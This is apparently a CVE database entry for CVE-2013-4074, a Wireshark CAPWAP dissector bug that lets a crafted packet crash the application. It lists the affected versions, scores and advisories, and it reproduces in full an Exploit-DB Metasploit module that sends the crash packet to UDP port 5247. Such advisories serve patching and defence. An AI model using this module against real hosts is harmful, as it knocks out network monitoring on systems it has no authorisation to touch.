CVE-2013-4074 : Detail

CVE-2013-4074

33.48%V4
Network
2013-06-09
19h00 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The dissect_capwap_data function in epan/dissectors/packet-capwap.c in the CAPWAP dissector in Wireshark 1.6.x before 1.6.16 and 1.8.x before 1.8.8 incorrectly uses a -1 data value to represent an error condition, which allows remote attackers to cause a denial of service (application crash) via a crafted packet.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-189 Category : Numeric Errors
Weaknesses in this category are related to improper calculation or conversion of numbers.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 33556

Publication date : 2014-05-27 22h00 +00:00
Author : j0sm1
EDB Verified : Yes

# # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Wireshark CAPWAP Dissector DoS', 'Description' => %q{ This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an incomplete packet. }, 'License' => MSF_LICENSE, 'Author' => [ 'Laurent Butti', # Discovery vulnerability 'j0sm1' # Auxiliary msf module ], 'References' => [ ['CVE', '2013-4074'], ['OSVDB', '94091'], ['BID', '60500'] ], 'DisclosureDate' => 'Apr 28 2014')) # Protocol capwap needs port 5247 to trigger the dissector in wireshark register_options([ Opt::RPORT(5247) ], self.class) end def run connect_udp # We send a packet incomplete to crash dissector print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then # the dissector crash # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 buf = Rex::Text.rand_text(3) + "\x90" + Rex::Text.rand_text(15) udp_sock.put(buf) disconnect_udp end end

Products Mentioned

Configuraton 0

Wireshark>>Wireshark >> Version 1.6.0

Wireshark>>Wireshark >> Version 1.6.1

Wireshark>>Wireshark >> Version 1.6.2

Wireshark>>Wireshark >> Version 1.6.3

Wireshark>>Wireshark >> Version 1.6.4

Wireshark>>Wireshark >> Version 1.6.5

Wireshark>>Wireshark >> Version 1.6.6

Wireshark>>Wireshark >> Version 1.6.7

Wireshark>>Wireshark >> Version 1.6.8

Wireshark>>Wireshark >> Version 1.6.9

Wireshark>>Wireshark >> Version 1.6.10

Wireshark>>Wireshark >> Version 1.6.11

Wireshark>>Wireshark >> Version 1.6.12

Wireshark>>Wireshark >> Version 1.6.13

Wireshark>>Wireshark >> Version 1.6.14

Wireshark>>Wireshark >> Version 1.6.15

Configuraton 0

Debian>>Debian_linux >> Version 7.0

Opensuse>>Opensuse >> Version 11.4

Opensuse>>Opensuse >> Version 12.2

Opensuse>>Opensuse >> Version 12.3

Configuraton 0

Wireshark>>Wireshark >> Version 1.8.0

Wireshark>>Wireshark >> Version 1.8.1

Wireshark>>Wireshark >> Version 1.8.2

Wireshark>>Wireshark >> Version 1.8.3

Wireshark>>Wireshark >> Version 1.8.4

Wireshark>>Wireshark >> Version 1.8.5

Wireshark>>Wireshark >> Version 1.8.6

Wireshark>>Wireshark >> Version 1.8.7

References

http://www.exploit-db.com/exploits/33556
Tags : exploit, x_refsource_EXPLOIT-DB
http://secunia.com/advisories/53762
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/54425
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.gentoo.org/security/en/glsa/glsa-201308-05.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.debian.org/security/2013/dsa-2709
Tags : vendor-advisory, x_refsource_DEBIAN
http://osvdb.org/show/osvdb/94091
Tags : vdb-entry, x_refsource_OSVDB
http://www.mandriva.com/security/advisories?name=MDVSA-2013:172
Tags : vendor-advisory, x_refsource_MANDRIVA
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.